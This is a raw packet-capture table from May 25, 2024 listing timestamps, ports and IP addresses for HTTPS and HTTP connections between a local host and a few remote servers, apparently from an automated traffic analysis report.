May 25, 2024 21:30:15.171426058 CEST	443	49796	65.109.242.59	192.168.2.4
May 25, 2024 21:30:15.685456991 CEST	443	49796	65.109.242.59	192.168.2.4
May 25, 2024 21:30:15.685527086 CEST	443	49796	65.109.242.59	192.168.2.4
May 25, 2024 21:30:15.685570955 CEST	443	49796	65.109.242.59	192.168.2.4
May 25, 2024 21:30:15.685671091 CEST	49796	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:15.685671091 CEST	49796	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:15.685671091 CEST	49796	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:15.685707092 CEST	443	49796	65.109.242.59	192.168.2.4
May 25, 2024 21:30:15.685765982 CEST	49796	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:15.723473072 CEST	443	49796	65.109.242.59	192.168.2.4
May 25, 2024 21:30:15.723541975 CEST	443	49796	65.109.242.59	192.168.2.4
May 25, 2024 21:30:15.723727942 CEST	49796	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:15.723728895 CEST	49796	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:15.723788977 CEST	443	49796	65.109.242.59	192.168.2.4
May 25, 2024 21:30:15.723864079 CEST	49796	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:15.783257008 CEST	80	49797	158.160.165.129	192.168.2.4
May 25, 2024 21:30:15.783303976 CEST	80	49797	158.160.165.129	192.168.2.4
May 25, 2024 21:30:15.783593893 CEST	49797	80	192.168.2.4	158.160.165.129
May 25, 2024 21:30:15.783593893 CEST	49797	80	192.168.2.4	158.160.165.129
May 25, 2024 21:30:15.785449028 CEST	49798	80	192.168.2.4	185.154.13.143
May 25, 2024 21:30:15.793833971 CEST	443	49796	65.109.242.59	192.168.2.4
May 25, 2024 21:30:15.793891907 CEST	443	49796	65.109.242.59	192.168.2.4
May 25, 2024 21:30:15.794200897 CEST	49796	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:15.794260979 CEST	443	49796	65.109.242.59	192.168.2.4
May 25, 2024 21:30:15.794339895 CEST	49796	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:15.797147989 CEST	80	49797	158.160.165.129	192.168.2.4
May 25, 2024 21:30:15.797333956 CEST	49797	80	192.168.2.4	158.160.165.129
May 25, 2024 21:30:15.804598093 CEST	80	49797	158.160.165.129	192.168.2.4
May 25, 2024 21:30:15.804636955 CEST	80	49798	185.154.13.143	192.168.2.4
May 25, 2024 21:30:15.804955006 CEST	49798	80	192.168.2.4	185.154.13.143
May 25, 2024 21:30:15.807744026 CEST	49798	80	192.168.2.4	185.154.13.143
May 25, 2024 21:30:15.819597960 CEST	80	49798	185.154.13.143	192.168.2.4
May 25, 2024 21:30:15.830034971 CEST	443	49796	65.109.242.59	192.168.2.4
May 25, 2024 21:30:15.830100060 CEST	443	49796	65.109.242.59	192.168.2.4
May 25, 2024 21:30:15.830261946 CEST	49796	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:15.830262899 CEST	49796	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:15.830324888 CEST	443	49796	65.109.242.59	192.168.2.4
May 25, 2024 21:30:15.830379009 CEST	49796	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:15.877213955 CEST	443	49796	65.109.242.59	192.168.2.4
May 25, 2024 21:30:15.877273083 CEST	443	49796	65.109.242.59	192.168.2.4
May 25, 2024 21:30:15.877376080 CEST	49796	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:15.877434969 CEST	443	49796	65.109.242.59	192.168.2.4
May 25, 2024 21:30:15.877522945 CEST	49796	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:15.877523899 CEST	49796	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:15.900068998 CEST	443	49796	65.109.242.59	192.168.2.4
May 25, 2024 21:30:15.900120974 CEST	443	49796	65.109.242.59	192.168.2.4
May 25, 2024 21:30:15.900325060 CEST	49796	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:15.900325060 CEST	49796	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:15.900388002 CEST	443	49796	65.109.242.59	192.168.2.4
May 25, 2024 21:30:15.900465012 CEST	49796	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:15.921277046 CEST	443	49796	65.109.242.59	192.168.2.4
May 25, 2024 21:30:15.921329975 CEST	443	49796	65.109.242.59	192.168.2.4
May 25, 2024 21:30:15.921653986 CEST	49796	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:15.921715021 CEST	443	49796	65.109.242.59	192.168.2.4
May 25, 2024 21:30:15.922102928 CEST	49796	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:15.942852974 CEST	443	49796	65.109.242.59	192.168.2.4
May 25, 2024 21:30:15.942912102 CEST	443	49796	65.109.242.59	192.168.2.4
May 25, 2024 21:30:15.943128109 CEST	49796	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:15.943128109 CEST	49796	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:15.943192959 CEST	443	49796	65.109.242.59	192.168.2.4
May 25, 2024 21:30:15.943273067 CEST	49796	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:15.958444118 CEST	443	49796	65.109.242.59	192.168.2.4
May 25, 2024 21:30:15.958508968 CEST	443	49796	65.109.242.59	192.168.2.4
May 25, 2024 21:30:15.958553076 CEST	49796	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:15.958609104 CEST	443	49796	65.109.242.59	192.168.2.4
May 25, 2024 21:30:15.958894968 CEST	49796	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:15.958894968 CEST	49796	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:15.986040115 CEST	443	49796	65.109.242.59	192.168.2.4
May 25, 2024 21:30:15.986095905 CEST	443	49796	65.109.242.59	192.168.2.4
May 25, 2024 21:30:15.986402988 CEST	49796	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:15.986402988 CEST	49796	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:15.986464977 CEST	443	49796	65.109.242.59	192.168.2.4
May 25, 2024 21:30:15.986557007 CEST	49796	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:16.006670952 CEST	443	49796	65.109.242.59	192.168.2.4
May 25, 2024 21:30:16.006743908 CEST	443	49796	65.109.242.59	192.168.2.4
May 25, 2024 21:30:16.007055044 CEST	49796	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:16.007145882 CEST	443	49796	65.109.242.59	192.168.2.4
May 25, 2024 21:30:16.007514000 CEST	49796	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:16.020092010 CEST	443	49796	65.109.242.59	192.168.2.4
May 25, 2024 21:30:16.020163059 CEST	443	49796	65.109.242.59	192.168.2.4
May 25, 2024 21:30:16.020255089 CEST	49796	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:16.020313978 CEST	443	49796	65.109.242.59	192.168.2.4
May 25, 2024 21:30:16.020387888 CEST	49796	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:16.022136927 CEST	49796	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:16.029186010 CEST	443	49796	65.109.242.59	192.168.2.4
May 25, 2024 21:30:16.029239893 CEST	443	49796	65.109.242.59	192.168.2.4
May 25, 2024 21:30:16.029537916 CEST	49796	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:16.029599905 CEST	443	49796	65.109.242.59	192.168.2.4
May 25, 2024 21:30:16.030034065 CEST	49796	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:16.041274071 CEST	443	49796	65.109.242.59	192.168.2.4
May 25, 2024 21:30:16.041292906 CEST	443	49796	65.109.242.59	192.168.2.4
May 25, 2024 21:30:16.041666031 CEST	49796	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:16.041728020 CEST	443	49796	65.109.242.59	192.168.2.4
May 25, 2024 21:30:16.041904926 CEST	49796	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:16.049762011 CEST	443	49796	65.109.242.59	192.168.2.4
May 25, 2024 21:30:16.049778938 CEST	443	49796	65.109.242.59	192.168.2.4
May 25, 2024 21:30:16.049931049 CEST	49796	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:16.049998999 CEST	443	49796	65.109.242.59	192.168.2.4
May 25, 2024 21:30:16.050071955 CEST	49796	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:16.063425064 CEST	443	49796	65.109.242.59	192.168.2.4
May 25, 2024 21:30:16.063437939 CEST	443	49796	65.109.242.59	192.168.2.4
May 25, 2024 21:30:16.063725948 CEST	49796	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:16.063786030 CEST	443	49796	65.109.242.59	192.168.2.4
May 25, 2024 21:30:16.063946962 CEST	49796	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:16.070594072 CEST	443	49796	65.109.242.59	192.168.2.4
May 25, 2024 21:30:16.070652962 CEST	443	49796	65.109.242.59	192.168.2.4
May 25, 2024 21:30:16.070841074 CEST	49796	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:16.070841074 CEST	49796	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:16.070935011 CEST	443	49796	65.109.242.59	192.168.2.4
May 25, 2024 21:30:16.070998907 CEST	49796	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:16.079324007 CEST	443	49796	65.109.242.59	192.168.2.4
May 25, 2024 21:30:16.079372883 CEST	443	49796	65.109.242.59	192.168.2.4
May 25, 2024 21:30:16.079585075 CEST	49796	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:16.079586029 CEST	49796	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:16.079648018 CEST	443	49796	65.109.242.59	192.168.2.4
May 25, 2024 21:30:16.079724073 CEST	49796	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:16.090035915 CEST	443	49796	65.109.242.59	192.168.2.4
May 25, 2024 21:30:16.090095997 CEST	443	49796	65.109.242.59	192.168.2.4
May 25, 2024 21:30:16.090265989 CEST	49796	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:16.090266943 CEST	49796	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:16.090328932 CEST	443	49796	65.109.242.59	192.168.2.4
May 25, 2024 21:30:16.090466976 CEST	49796	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:16.104695082 CEST	443	49796	65.109.242.59	192.168.2.4
May 25, 2024 21:30:16.104749918 CEST	443	49796	65.109.242.59	192.168.2.4
May 25, 2024 21:30:16.104950905 CEST	49796	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:16.104952097 CEST	49796	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:16.105014086 CEST	443	49796	65.109.242.59	192.168.2.4
May 25, 2024 21:30:16.105092049 CEST	49796	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:16.119580984 CEST	443	49796	65.109.242.59	192.168.2.4
May 25, 2024 21:30:16.119627953 CEST	443	49796	65.109.242.59	192.168.2.4
May 25, 2024 21:30:16.119807005 CEST	49796	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:16.119807005 CEST	49796	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:16.119868994 CEST	443	49796	65.109.242.59	192.168.2.4
May 25, 2024 21:30:16.119936943 CEST	49796	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:16.127700090 CEST	443	49796	65.109.242.59	192.168.2.4
May 25, 2024 21:30:16.127744913 CEST	443	49796	65.109.242.59	192.168.2.4
May 25, 2024 21:30:16.127818108 CEST	49796	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:16.127883911 CEST	443	49796	65.109.242.59	192.168.2.4
May 25, 2024 21:30:16.127923965 CEST	49796	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:16.127947092 CEST	49796	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:16.139539957 CEST	443	49796	65.109.242.59	192.168.2.4
May 25, 2024 21:30:16.139570951 CEST	443	49796	65.109.242.59	192.168.2.4
May 25, 2024 21:30:16.139786959 CEST	49796	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:16.139786959 CEST	49796	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:16.139849901 CEST	443	49796	65.109.242.59	192.168.2.4
May 25, 2024 21:30:16.139914036 CEST	49796	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:16.148983002 CEST	443	49796	65.109.242.59	192.168.2.4
May 25, 2024 21:30:16.149007082 CEST	443	49796	65.109.242.59	192.168.2.4
May 25, 2024 21:30:16.149207115 CEST	49796	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:16.149207115 CEST	49796	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:16.149270058 CEST	443	49796	65.109.242.59	192.168.2.4
May 25, 2024 21:30:16.149333954 CEST	49796	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:16.157732964 CEST	443	49796	65.109.242.59	192.168.2.4
May 25, 2024 21:30:16.157757044 CEST	443	49796	65.109.242.59	192.168.2.4
May 25, 2024 21:30:16.157969952 CEST	49796	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:16.158030987 CEST	443	49796	65.109.242.59	192.168.2.4
May 25, 2024 21:30:16.158102989 CEST	49796	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:16.164994001 CEST	443	49796	65.109.242.59	192.168.2.4
May 25, 2024 21:30:16.165018082 CEST	443	49796	65.109.242.59	192.168.2.4
May 25, 2024 21:30:16.165213108 CEST	49796	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:16.165213108 CEST	49796	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:16.165276051 CEST	443	49796	65.109.242.59	192.168.2.4
May 25, 2024 21:30:16.165441990 CEST	49796	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:16.182737112 CEST	443	49796	65.109.242.59	192.168.2.4
May 25, 2024 21:30:16.182782888 CEST	443	49796	65.109.242.59	192.168.2.4
May 25, 2024 21:30:16.183092117 CEST	49796	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:16.183151960 CEST	443	49796	65.109.242.59	192.168.2.4
May 25, 2024 21:30:16.183240891 CEST	49796	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:16.188015938 CEST	443	49796	65.109.242.59	192.168.2.4
May 25, 2024 21:30:16.188102007 CEST	443	49796	65.109.242.59	192.168.2.4
May 25, 2024 21:30:16.188224077 CEST	49796	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:16.188225031 CEST	49796	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:16.188461065 CEST	49796	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:16.188461065 CEST	49796	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:16.188508034 CEST	443	49796	65.109.242.59	192.168.2.4
May 25, 2024 21:30:16.188591003 CEST	49796	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:16.239186049 CEST	49799	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:16.239264965 CEST	443	49799	65.109.242.59	192.168.2.4
May 25, 2024 21:30:16.239362001 CEST	49799	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:16.239638090 CEST	49799	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:16.239680052 CEST	443	49799	65.109.242.59	192.168.2.4
May 25, 2024 21:30:17.882250071 CEST	443	49799	65.109.242.59	192.168.2.4
May 25, 2024 21:30:17.882510900 CEST	49799	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:17.882924080 CEST	49799	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:17.882951975 CEST	443	49799	65.109.242.59	192.168.2.4
May 25, 2024 21:30:17.883085966 CEST	49799	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:17.883097887 CEST	443	49799	65.109.242.59	192.168.2.4
May 25, 2024 21:30:18.393218040 CEST	443	49799	65.109.242.59	192.168.2.4
May 25, 2024 21:30:18.393285036 CEST	443	49799	65.109.242.59	192.168.2.4
May 25, 2024 21:30:18.393315077 CEST	443	49799	65.109.242.59	192.168.2.4
May 25, 2024 21:30:18.393740892 CEST	49799	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:18.393775940 CEST	443	49799	65.109.242.59	192.168.2.4
May 25, 2024 21:30:18.394188881 CEST	49799	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:18.428653002 CEST	443	49799	65.109.242.59	192.168.2.4
May 25, 2024 21:30:18.428704023 CEST	443	49799	65.109.242.59	192.168.2.4
May 25, 2024 21:30:18.429045916 CEST	49799	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:18.429105997 CEST	443	49799	65.109.242.59	192.168.2.4
May 25, 2024 21:30:18.429202080 CEST	49799	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:18.501245975 CEST	443	49799	65.109.242.59	192.168.2.4
May 25, 2024 21:30:18.501300097 CEST	443	49799	65.109.242.59	192.168.2.4
May 25, 2024 21:30:18.501437902 CEST	49799	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:18.501437902 CEST	49799	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:18.501509905 CEST	443	49799	65.109.242.59	192.168.2.4
May 25, 2024 21:30:18.501597881 CEST	49799	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:18.541073084 CEST	443	49799	65.109.242.59	192.168.2.4
May 25, 2024 21:30:18.541126966 CEST	443	49799	65.109.242.59	192.168.2.4
May 25, 2024 21:30:18.541277885 CEST	49799	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:18.541279078 CEST	49799	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:18.541340113 CEST	443	49799	65.109.242.59	192.168.2.4
May 25, 2024 21:30:18.541400909 CEST	49799	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:18.579722881 CEST	443	49799	65.109.242.59	192.168.2.4
May 25, 2024 21:30:18.579777956 CEST	443	49799	65.109.242.59	192.168.2.4
May 25, 2024 21:30:18.579950094 CEST	49799	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:18.579951048 CEST	49799	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:18.580023050 CEST	443	49799	65.109.242.59	192.168.2.4
May 25, 2024 21:30:18.580089092 CEST	49799	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:18.610757113 CEST	443	49799	65.109.242.59	192.168.2.4
May 25, 2024 21:30:18.610816956 CEST	443	49799	65.109.242.59	192.168.2.4
May 25, 2024 21:30:18.611143112 CEST	49799	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:18.611202955 CEST	443	49799	65.109.242.59	192.168.2.4
May 25, 2024 21:30:18.611290932 CEST	49799	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:18.628938913 CEST	443	49799	65.109.242.59	192.168.2.4
May 25, 2024 21:30:18.628983974 CEST	443	49799	65.109.242.59	192.168.2.4
May 25, 2024 21:30:18.629331112 CEST	49799	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:18.629360914 CEST	443	49799	65.109.242.59	192.168.2.4
May 25, 2024 21:30:18.629565954 CEST	49799	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:18.648119926 CEST	443	49799	65.109.242.59	192.168.2.4
May 25, 2024 21:30:18.648164034 CEST	443	49799	65.109.242.59	192.168.2.4
May 25, 2024 21:30:18.648369074 CEST	49799	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:18.648400068 CEST	443	49799	65.109.242.59	192.168.2.4
May 25, 2024 21:30:18.648643970 CEST	49799	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:18.666321993 CEST	443	49799	65.109.242.59	192.168.2.4
May 25, 2024 21:30:18.666368961 CEST	443	49799	65.109.242.59	192.168.2.4
May 25, 2024 21:30:18.666464090 CEST	49799	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:18.666532993 CEST	443	49799	65.109.242.59	192.168.2.4
May 25, 2024 21:30:18.666604042 CEST	49799	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:18.666604042 CEST	49799	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:18.686413050 CEST	443	49799	65.109.242.59	192.168.2.4
May 25, 2024 21:30:18.686455965 CEST	443	49799	65.109.242.59	192.168.2.4
May 25, 2024 21:30:18.686654091 CEST	49799	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:18.686654091 CEST	49799	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:18.686717987 CEST	443	49799	65.109.242.59	192.168.2.4
May 25, 2024 21:30:18.686800003 CEST	49799	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:18.702404022 CEST	443	49799	65.109.242.59	192.168.2.4
May 25, 2024 21:30:18.702450037 CEST	443	49799	65.109.242.59	192.168.2.4
May 25, 2024 21:30:18.702759981 CEST	49799	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:18.702820063 CEST	443	49799	65.109.242.59	192.168.2.4
May 25, 2024 21:30:18.702917099 CEST	49799	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:18.719276905 CEST	443	49799	65.109.242.59	192.168.2.4
May 25, 2024 21:30:18.719321012 CEST	443	49799	65.109.242.59	192.168.2.4
May 25, 2024 21:30:18.719525099 CEST	49799	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:18.719526052 CEST	49799	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:18.719588041 CEST	443	49799	65.109.242.59	192.168.2.4
May 25, 2024 21:30:18.719660044 CEST	49799	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:18.736737013 CEST	443	49799	65.109.242.59	192.168.2.4
May 25, 2024 21:30:18.736830950 CEST	443	49799	65.109.242.59	192.168.2.4
May 25, 2024 21:30:18.736974955 CEST	49799	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:18.736974955 CEST	49799	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:18.737005949 CEST	443	49799	65.109.242.59	192.168.2.4
May 25, 2024 21:30:18.737076998 CEST	49799	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:18.744873047 CEST	443	49799	65.109.242.59	192.168.2.4
May 25, 2024 21:30:18.744919062 CEST	443	49799	65.109.242.59	192.168.2.4
May 25, 2024 21:30:18.745074034 CEST	49799	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:18.745074034 CEST	49799	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:18.745105982 CEST	443	49799	65.109.242.59	192.168.2.4
May 25, 2024 21:30:18.745170116 CEST	49799	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:18.755678892 CEST	443	49799	65.109.242.59	192.168.2.4
May 25, 2024 21:30:18.755723000 CEST	443	49799	65.109.242.59	192.168.2.4
May 25, 2024 21:30:18.755904913 CEST	49799	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:18.755904913 CEST	49799	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:18.755968094 CEST	443	49799	65.109.242.59	192.168.2.4
May 25, 2024 21:30:18.756046057 CEST	49799	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:18.763348103 CEST	443	49799	65.109.242.59	192.168.2.4
May 25, 2024 21:30:18.763395071 CEST	443	49799	65.109.242.59	192.168.2.4
May 25, 2024 21:30:18.763463020 CEST	49799	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:18.763530016 CEST	443	49799	65.109.242.59	192.168.2.4
May 25, 2024 21:30:18.763576031 CEST	49799	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:18.763601065 CEST	49799	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:18.772965908 CEST	443	49799	65.109.242.59	192.168.2.4
May 25, 2024 21:30:18.773009062 CEST	443	49799	65.109.242.59	192.168.2.4
May 25, 2024 21:30:18.773200989 CEST	49799	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:18.773200989 CEST	49799	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:18.773267031 CEST	443	49799	65.109.242.59	192.168.2.4
May 25, 2024 21:30:18.773338079 CEST	49799	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:18.782315016 CEST	443	49799	65.109.242.59	192.168.2.4
May 25, 2024 21:30:18.782362938 CEST	443	49799	65.109.242.59	192.168.2.4
May 25, 2024 21:30:18.782569885 CEST	49799	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:18.782571077 CEST	49799	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:18.782635927 CEST	443	49799	65.109.242.59	192.168.2.4
May 25, 2024 21:30:18.782711983 CEST	49799	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:18.790744066 CEST	443	49799	65.109.242.59	192.168.2.4
May 25, 2024 21:30:18.790786982 CEST	443	49799	65.109.242.59	192.168.2.4
May 25, 2024 21:30:18.791129112 CEST	49799	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:18.791189909 CEST	443	49799	65.109.242.59	192.168.2.4
May 25, 2024 21:30:18.791290045 CEST	49799	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:18.811887980 CEST	443	49799	65.109.242.59	192.168.2.4
May 25, 2024 21:30:18.811930895 CEST	443	49799	65.109.242.59	192.168.2.4
May 25, 2024 21:30:18.812165022 CEST	49799	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:18.812232971 CEST	443	49799	65.109.242.59	192.168.2.4
May 25, 2024 21:30:18.812278032 CEST	49799	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:18.812304974 CEST	49799	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:18.818671942 CEST	443	49799	65.109.242.59	192.168.2.4
May 25, 2024 21:30:18.818716049 CEST	443	49799	65.109.242.59	192.168.2.4
May 25, 2024 21:30:18.818943024 CEST	49799	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:18.818943024 CEST	49799	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:18.819005966 CEST	443	49799	65.109.242.59	192.168.2.4
May 25, 2024 21:30:18.819072962 CEST	49799	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:18.829128981 CEST	443	49799	65.109.242.59	192.168.2.4
May 25, 2024 21:30:18.829170942 CEST	443	49799	65.109.242.59	192.168.2.4
May 25, 2024 21:30:18.829243898 CEST	49799	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:18.829273939 CEST	443	49799	65.109.242.59	192.168.2.4
May 25, 2024 21:30:18.829297066 CEST	49799	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:18.829328060 CEST	49799	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:18.855176926 CEST	443	49799	65.109.242.59	192.168.2.4
May 25, 2024 21:30:18.855223894 CEST	443	49799	65.109.242.59	192.168.2.4
May 25, 2024 21:30:18.855293989 CEST	49799	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:18.855303049 CEST	443	49799	65.109.242.59	192.168.2.4
May 25, 2024 21:30:18.855561972 CEST	49799	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:18.855561972 CEST	49799	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:18.860227108 CEST	443	49799	65.109.242.59	192.168.2.4
May 25, 2024 21:30:18.860265970 CEST	443	49799	65.109.242.59	192.168.2.4
May 25, 2024 21:30:18.860455036 CEST	49799	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:18.860455036 CEST	49799	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:18.860517025 CEST	443	49799	65.109.242.59	192.168.2.4
May 25, 2024 21:30:18.860584974 CEST	49799	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:18.865422010 CEST	443	49799	65.109.242.59	192.168.2.4
May 25, 2024 21:30:18.865466118 CEST	443	49799	65.109.242.59	192.168.2.4
May 25, 2024 21:30:18.865624905 CEST	49799	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:18.865626097 CEST	49799	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:18.865688086 CEST	443	49799	65.109.242.59	192.168.2.4
May 25, 2024 21:30:18.865753889 CEST	49799	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:18.875883102 CEST	443	49799	65.109.242.59	192.168.2.4
May 25, 2024 21:30:18.875926971 CEST	443	49799	65.109.242.59	192.168.2.4
May 25, 2024 21:30:18.876122952 CEST	49799	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:18.876122952 CEST	49799	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:18.876184940 CEST	443	49799	65.109.242.59	192.168.2.4
May 25, 2024 21:30:18.876241922 CEST	49799	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:18.881714106 CEST	443	49799	65.109.242.59	192.168.2.4
May 25, 2024 21:30:18.881761074 CEST	443	49799	65.109.242.59	192.168.2.4
May 25, 2024 21:30:18.881959915 CEST	49799	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:18.881961107 CEST	49799	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:18.882023096 CEST	443	49799	65.109.242.59	192.168.2.4
May 25, 2024 21:30:18.882106066 CEST	49799	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:18.891545057 CEST	443	49799	65.109.242.59	192.168.2.4
May 25, 2024 21:30:18.891601086 CEST	443	49799	65.109.242.59	192.168.2.4
May 25, 2024 21:30:18.891870975 CEST	49799	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:18.891931057 CEST	443	49799	65.109.242.59	192.168.2.4
May 25, 2024 21:30:18.892010927 CEST	49799	443	192.168.2.4	65.109.242.59
